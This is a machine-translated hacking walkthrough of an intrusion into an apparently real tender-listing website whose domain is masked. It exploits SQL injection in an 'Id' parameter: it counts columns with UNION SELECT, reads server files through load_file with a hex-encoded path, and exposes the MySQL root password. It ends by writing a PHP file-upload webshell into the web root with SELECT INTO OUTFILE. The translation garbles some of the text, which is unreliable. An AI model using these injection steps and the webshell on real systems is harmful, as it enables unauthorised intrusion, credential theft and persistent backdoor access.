The test site is as follows:
Http: // www. ******. com
Find a step
Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830
Submit one
Returned results
Warning: mysql_result (): supplied argument is not a valid MySQL result resource in
/Var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135
Warning: mysql_result (): supplied argument is not a valid MySQL result resource in
/Var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140
Warning: mysql_result (): supplied argument is not a valid MySQL result resource in
/Var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154
The path is out and security check continues.
Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 & #39; and 1 = 1 #
An error is returned, not a struct type.
Note: % 23 is #
Submit and 1 = 1 and return normal
Submission and 1 = 2 returns abnormal
The following is the union statement.
And 1 = 1 union select 1 returns abnormal
And 1 = 1 union select 1, 2 returns abnormal
And 1 = 1 union select 1, 2, 3 returns abnormal
And 1 = 1 union select 1, 2, 3, 4 returns abnormal
And 1 = 1 union select 1, 2, 3, 4, 5 return abnormal
And 1 = 1 union select 1, 2, 3, 4, 5, 6 Returns abnormal
And 1 = 1 union select 1, 2, 4, 5, 6, 7 returns abnormal
And 1 = 1 union select 1, 2, 3, 4, 5, 6, 7, 8 returns abnormal
And 1 = 1 union select 1, 2, 3, 4, 5, 6, 7, 8, 9 return abnormal
And 1 = 1 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 returns abnormal
And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11 returns abnormal
And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12 returns abnormal
And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 returns abnormal
And 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 return normal
It will be normal to guess 14 and continue the next step.
Generally, it is impossible for us to find such a site in the background ..
Let's see if there is any more ..
Guess common paths.
Login. php
Admin. php
Admin_login.php
Admin_index.php
Admin/login. php
Admin/admin. php
Admin/admin_login.php
Admin/admin_index.php
Manage/index. php
Manage/login. php
Manage/admin_login.php
Manage/admin_index.php
Wait. If you have the patience, you can guess it slowly. Even if you have guessed it, it will be useless.
Let's use a direct method. Use load_file to read the file content directly.
Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
And 1 = 1 to and 1 = 2
The returned results are as follows:
2
The file content we need is cracked at location 2.
From/var/www/html/zhaobiao/zhaobiao_hy_show.php
Directly use load_file (/var/www/html/zhaobiao/zhaobiao_hy_show.php)
The premise is to convert/var/www/html/zhaobiao/zhaobiao_hy_show.php to hexadecimal
Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 2 union select 1, load_file
(Random), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
Returned results
0 or $ regdate> mysql_result ($ query, 0, yxdate) {?>
", Mysql_result ($ query, 0, sm);?>
Do not worry about this. Check that the source file finds an inc. php file and works with the preceding path.
/Var/www/html/inc. php
Http: // www. ******. com/zhaobiao/zhaobiao_hy_show.php? Id = 149830 and 1 = 2 union select 1, load_file
(0x2f7661722f77772f68746d6c2f696e632e706870), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
When a brute-force attack returns, you cannot see the content and directly view the source file.
<?
$ Myconn = mysql_connect (localhost, root, www. ******. comy0p5h1i0 );
Mysql_select_db (mlk );
?>
Mysql is exposed ..
The next step is to log on to Mysql and insert the prepared pony ..
Use mlk;
Create table mmxy (cmd TEXT );
Insert into mmxy values (<? Php );
Insert into mmxy values ($ msg = copy ($ _ FILES [MyFile] [tmp_name], $ _ FILES [MyFile] [name])? "Successful": "failure ";);
Insert into mmxy values (echo $ msg ;);
Insert into mmxy values (?> );
Insert into mmxy values (<form ENCTYPE = "multipart/form-data" ACTION = "" METHOD = "POST"> );
Insert into mmxy values (<input NAME = "MyFile" TYPE = "file"> );
Insert into mmxy values (<input VALUE = "Up" TYPE = "submit"> </form> );
Select * from mmxy into outfile/var/www/html/zhaobiao/mmxy. php;